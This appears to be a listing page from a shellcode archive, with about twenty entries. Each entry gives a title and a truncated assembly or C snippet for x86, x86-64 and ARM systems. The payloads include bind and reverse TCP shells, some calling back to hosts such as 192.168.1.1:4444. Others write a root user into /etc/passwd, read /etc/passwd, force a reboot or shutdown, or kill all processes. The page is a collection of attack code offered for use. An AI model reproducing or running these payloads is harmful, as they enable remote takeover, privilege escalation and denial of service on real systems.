BSD/x86 - Write to /etc/passwd with uid(0) + gid(0) Shellcode (74 bytes)

/ writes the line for user in /etc/passwd with uid&gid == 0 OS: BSD length: 74 written by dev0id email protected rootteam.void.ru rus-sec /Efnet.org greetz: mig nerf BITS 32 main: xor eax,eax push eax push byte 0x64 push word 0x7773 push long 0x7361702f push long 0x6374652f mov ebx,esp mov al,0x0...

Linux/x86 - Bind TCP (64713/TCP) Shell (/bin/sh) Shellcode (83 bytes)

/ linux/x86 portbind /bin/sh port 64713 83 bytes http://www.gonullyourself.org sToRm / char shellcode = // : "\x6a\x66" // push $0x66 "\x58" // pop %eax "\x31\xdb" // xor %ebx,%ebx "\x53" // push %ebx "\x43" // inc %ebx "\x53" // push %ebx "\x6a\x02" // push $0x2 "\x89\xe1" // mov %esp,%ecx...

Linux/x86 - execve(/sbin/reboot,/sbin/reboot) Shellcode (28 bytes)

include const char shellcode= "\x6a\x0b" // push $0xb "\x58" // pop %eax "\x99" // cltd "\x52" // push %edx "\x68\x62\x6f\x6f\x74" // push $0x746f6f62 "\x68\x6e\x2f\x72\x65" // push $0x65722f6e "\x68\x2f\x73\x62\x69" // push $0x6962732f "\x89\xe3" // mov %esp,%ebx "\x52" // push %edx "\x53" // pu...

Linux/x86 - symlink /bin/sh sh Shellcode (36 bytes)

/The shellcode calls the symlink and makes the link to the /bin/sh in the current dir. size = 36 bytes OS = Linux i386 written by /rootteam/dev0id rootteam.void.ru BITS 32 jmp short callit doit: pop esi xor eax,eax mov byte esi+7,al mov byte esi+10,al mov byte al,83 lea ebx,esi lea ecx,esi+8 int...

Linux/x86 - exit(0) / exit(1) Shellcode (3/4 bytes)

include const char shellcode= "\x40" // inc %eax // "\x43" // inc %ebx "\xcd\x80"; // int $0x80 int main printf "\n+ Yet conditional %eax==0 Linux/x86 exit0 3 bytes or exit1 4 bytes" "\n+ Date: 18/06/2009" "\n+ Author: TheWorm" "\n\n+ Shellcode Size: %d bytes\n\n", sizeofshellcode-1; void...

Linux/x86 - Add Root User (w00w00) To /etc/passwd Shellcode (104 bytes)

/ jmp callw00w00 w00w00: popl %edi jmp w0w0w callw00w00: call w00w00 w0w0w: OPEN ecx=flag ORDONLY, OWRONLY, ... OWRONLY | OAPPEND | OCREAT = 0x441 edx=file mode ebx=address of filename eax=0x05 syscall number xorl %ebx,%ebx movb $file-w0w0w,%bl addl %edi,%ebx xorb %al,%al movb %al,11%ebx xorl...

Linux/x86-64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (105 bytes)

; =================================================================== ; Optimized version of shellcode at: ; http://shell-storm.org/shellcode/files/shellcode-867.php ; Author: SLAE64-1351 Keyman ; Date: 14/09/2014 ; ; Length: 105 bytes got shorter by 13 bytes ; ; What's new is that some...

Linux/ARM - Reverse TCP (192.168.1.1:4444/TCP) Shell (/bin/sh) + Password (MyPasswd) + Null-Free Shellcode (156 bytes)

Linux/ARM - Reverse TCP 192.168.1.1:4444/TCP Shell /bin/sh + Password MyPasswd + Null-Free Shellcode 156 bytes. Shellcode exploit for ARM platform / Title: Linux/ARM - Password Protected Reverse Shell TCP /bin/sh. Null free shellcode 156 bytes Date: 2018-01-15 Tested: armv7l Raspberry Pi v3 Autho...

Linux/x86-64 - shutdown -h now Shellcode (64 bytes)

; =================================================================== ; Optimized version of shellcode at: ; http://shell-storm.org/shellcode/files/shellcode-877.php ; Author: SLAE64-1351 Keyman ; Date: 14/09/2014 ; ; Length: 64 bytes got shorter by 1 byte :D ; ; What's new is that some...

Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Password) Shellcode (173 bytes)

;BindTCP 4444 with password ; ;Default password = Password ; ;If connected the shellcode no prompt for password ; ;Enter password directly and you get the bin/sh shell; ;if password is wrong the shellcode exit: ; ;Christophe G SLAE64 - 1337 size 173 bytes ; global start start: ; sock =...

Linux/x86-64 - Bind TCP (1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (131 bytes)

; Title: Shellcode linux/x86-64 bind-shell with netcat ; Author : Gaussillusion ; Len : 131 bytes ; Language : Nasm BITS 64 xor rdx,rdx mov rdi,0x636e2f6e69622fff shr rdi,0x08 push rdi mov rdi,rsp mov rcx,0x68732f6e69622fff shr rcx,0x08 push rcx mov rcx,rsp mov rbx,0x652dffffffffffff shr rbx,0x30...

OpenBSD/x86 - reboot() Shellcode (15 bytes)

// ----------bsd/x86 reboot shellcode----------------- // AUTHOR : beosroot // INFO : OpenBSD x86 reboot shellcode // EMAIL : email protected // email protected char shellcode = "\x31\xc0\x66\xba\x0e\x27\x66\x81\xea\x06\x27\xb0\x37\xcd\x80"; int main int ret = int &ret + 2; ret = intshellcode; //...

Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (147 bytes)

; =================================================================== ; Password Protected Bind Shell ; Author: SLAE64-1351 Keyman ; Date: 03/09/2014 ; ; Shellcode length: 147 bytes ; ; Description: ; ; Simple bind shell listens on port 4444 by default with 4 bytes ; password protection. Using a ...

Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (175 bytes)

/ ;Author - Andriy Brukhovetskyy - doomedraven - SLAEx64 - 1322 ;175 bytes ;http://www.doomedraven.com/2014/05/slaex64-shellbindtcp-with-passcode.html global start section .text start: push byte 0x29 ; 41 - socket syscall pop rax push byte 0x02 ; AFINET pop rdi push byte 0x01 ; SOCKSTREAM pop rsi...

Linux/x86-64 - Bind TCP (31337/TCP) Shell Shellcode (150 bytes)

/ Title : tcpbindshell 150 bytes Date : 04 October 2013 Author : Russell Willis Testd on: Linux/x8664 SMP Debian 3.2.46-1+deb7u1 x8664 GNU/Linux $ objdump -D tcpbindshell -M intel tcpbindshell: file format elf64-x86-64 Disassembly of section .text: 0000000000400080 : 400080: 48 31 c0 xor rax,rax...

Linux/x86-64 - Reverse TCP (192.168.1.10:31337/TCP) Shell Shellcode (118 bytes)

/ Title : reversetcpbindshell 118 bytes Date : 04 October 2013 Author : Russell Willis Testd on: Linux/x8664 SMP Debian 3.2.46-1+deb7u1 x8664 GNU/Linux $ objdump -D reversetcpbindshell -M intel reversetcpbindshell: file format elf64-x86-64 Disassembly of section .text: 0000000000400080 : 400080: ...

Linux/x86-64 - sys_access() Egghunter Shellcode (49 bytes)

; Author Doreth.Z10 ; ; Linux x8664 Egghunter using sysaccess ; Shellcode size 49 bytes ; global start section .text start: xor rsi, rsi ; Some prep junk. push rsi pop rdx push 8 pop rbx goendofpage: or dx, 0xfff ; We align with a page size of 0x1000 nextbyte: inc rdx ; next byte offset push 21 p...

Linux/x86-64 - Read /etc/passwd Shellcode (82 bytes)

BITS 64 ; Author Mr.Un1k0d3r - RingZer0 Team ; Read /etc/passwd Linux x8664 Shellcode ; Shellcode size 82 bytes global start section .text start: jmp pushfilename readfile: ; syscall open file pop rdi ; pop path value ; NULL byte fix xor byte rdi + 11, 0x41 xor rax, rax add al, 2 xor rsi, rsi ; s...

Linux/x86-64 - sethostname(Rooted !) + killall Shellcode (33 bytes)

Linux/x8664 sethostname & killall 33 bytes shellcode Date: 2010-04-26 Author: zbt Tested on: x8664 Debian GNU/Linux / ; sethostname"Rooted !"; ; kill-1, SIGKILL; section .text global start start: ;-- setHostName"Rooted !"; 22 bytes --; mov al, 0xaa mov r8, 'Rooted !' push r8 mov rdi, rsp mov sil,...

Linux/x86-64 - shutdown -h now Shellcode (65 bytes)

/ ; Title: shutdown -h now x8664 Shellcode - 65 bytes ; Platform: linux/x8664 ; Date: 2014-06-27 ; Author: Osanda Malith Jayathissa @OsandaMalith section .text global start start: xor rax, rax xor rdx, rdx push rax push byte 0x77 push word 0x6f6e ; now mov rbx, rsp push rax push word 0x682d ;-h m...